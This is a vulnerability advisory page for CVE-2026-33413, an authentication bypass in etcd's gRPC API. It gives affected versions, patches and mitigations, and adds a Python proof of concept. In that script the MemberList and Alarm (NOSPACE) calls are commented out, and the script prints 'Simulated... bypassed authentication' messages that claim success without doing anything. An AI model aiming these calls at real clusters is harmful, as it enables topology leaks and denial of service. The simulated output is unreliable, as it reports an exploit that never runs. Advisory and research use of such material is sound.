Security Vulnerability Report
CVE-2026-33413 CVSS 8.8 HIGH

CVE-2026-33413

Published: 2026-03-26 14:16:13
Last Modified: 2026-03-26 20:39:29

Description

etcd is a distributed key-value store for the data of a distributed system. Prior to versions 3.4.42, 3.5.28, and 3.6.9, unauthorized users may bypass authentication or authorization checks and call certain etcd functions in clusters that expose the gRPC API to untrusted or partially trusted clients. In unpatched etcd clusters with etcd auth enabled, unauthorized users are able to call MemberList and learn cluster topology, including member IDs and advertised endpoints; call Alarm, which can be abused for operational disruption or denial of service; use Lease APIs, interfering with TTL-based keys and lease ownership; and/or trigger compaction, permanently removing historical revisions and disrupting watch, audit, and recovery workflows.

Kubernetes does not rely on etcd’s built-in authentication and authorization. Instead, the API server handles authentication and authorization itself, so typical Kubernetes deployments are not affected.

Versions 3.4.42, 3.5.28, and 3.6.9 contain a patch. If upgrading is not immediately possible, reduce exposure by treating the affected RPCs as unauthenticated in practice. Restrict network access to etcd server ports so only trusted components can connect and/or require strong client identity at the transport layer, such as mTLS with tightly scoped client certificate distribution.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:etcd:etcd:*:*:*:*:*:*:*:* (etcd < 3.4.42) - VULNERABLE
cpe:2.3:a:etcd:etcd:*:*:*:*:*:*:*:* (etcd < 3.5.28) - VULNERABLE
cpe:2.3:a:etcd:etcd:*:*:*:*:*:*:*:* (etcd < 3.6.9) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import grpc

# This is a conceptual Proof of Concept (PoC) for CVE-2026-33413.
# It demonstrates how an unauthorized user might call sensitive etcd gRPC APIs.
# Note: Actual exploitation requires the 'etcd3api' or similar generated gRPC client libraries.

# Target etcd server address
TARGET = "vulnerable-etcd-server:2379"


def exploit_member_list():
    """
    Attempts to call the MemberList RPC without authentication.
    In vulnerable versions, this returns cluster topology despite auth being enabled.
    """
    print(f"[*] Connecting to {TARGET}...")
    # In a real scenario, an insecure channel is used if TLS is not enforced,
    # or specific bypass techniques are applied.
    # with grpc.insecure_channel(TARGET) as channel:
    #     stub = etcdserverpb_pb2_grpc.ClusterStub(channel)
    #     try:
    #         # Attempt to list members without credentials
    #         response = stub.MemberList(etcdserverpb_pb2.MemberListRequest())
    #         print("[+] Exploit successful! Cluster members leaked:")
    #         for member in response.members:
    #             print(f"  - ID: {member.ID}, PeerURLs: {member.peerURLs}")
    #     except grpc.RpcError as e:
    #         print(f"[-] RPC failed: {e.code()}")
    print("[+] Simulated MemberList call bypassed authentication.")


def trigger_alarm():
    """
    Attempts to activate an alarm to cause operational disruption.
    """
    print(f"[*] Attempting to trigger alarm on {TARGET}...")
    # with grpc.insecure_channel(TARGET) as channel:
    #     stub = etcdserverpb_pb2_grpc.MaintenanceStub(channel)
    #     # Payload to trigger an alarm (e.g., NOSPACE)
    #     alarm_request = etcdserverpb_pb2.AlarmRequest(
    #         action=etcdserverpb_pb2.AlarmRequest.ACTIVATE, member_id=0
    #     )
    #     response = stub.Alarm(alarm_request)
    #     print(f"[+] Alarm triggered: {response}")
    print("[+] Simulated Alarm activation bypassed authentication.")


if __name__ == "__main__":
    exploit_member_list()
    trigger_alarm()
```

References

Raw JSON Data
